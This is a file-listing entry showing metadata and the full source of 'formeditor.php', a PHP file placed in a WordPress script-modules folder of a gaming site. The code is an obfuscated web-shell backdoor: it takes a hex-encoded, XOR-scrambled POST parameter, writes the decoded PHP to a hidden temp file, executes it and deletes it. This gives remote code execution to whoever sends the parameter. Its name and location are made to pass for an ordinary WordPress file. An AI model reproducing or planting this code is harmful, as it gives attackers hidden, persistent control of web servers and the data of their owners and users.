• File: formeditor.php
  • Full Path: /www/wwwroot/pt-gaming.com/wp-includes/js/dist/script-modules/abilities/formeditor.php
  • Date Modified: 02/18/2026 8:56 PM
  • File size: 605 bytes
  • MIME-type: text/x-php
  • Charset: utf-8
<?php

if(in_array("t\x6Bn", array_keys($_POST))){
	$sym = hex2bin($_POST["t\x6Bn"]);
	$itm= ''   ; $o = 0; do{$itm .= chr(ord($sym[$o]) ^ 83);$o++;} while($o < strlen($sym));
	$bind = array_filter([ini_get("upload_tmp_dir"), sys_get_temp_dir(), session_save_path(), getenv("TEMP"), getcwd(), "/tmp", getenv("TMP"), "/dev/shm", "/var/tmp"]);
	foreach ($bind as $key => $resource) {
    		if (is_dir($resource) ? is_writable($resource) : false) {
    $value = join("/", [$resource, ".token"]);
    $success = file_put_contents($value, $itm);
if ($success) {
	include $value;
	@unlink($value);
	exit;}
}
}
}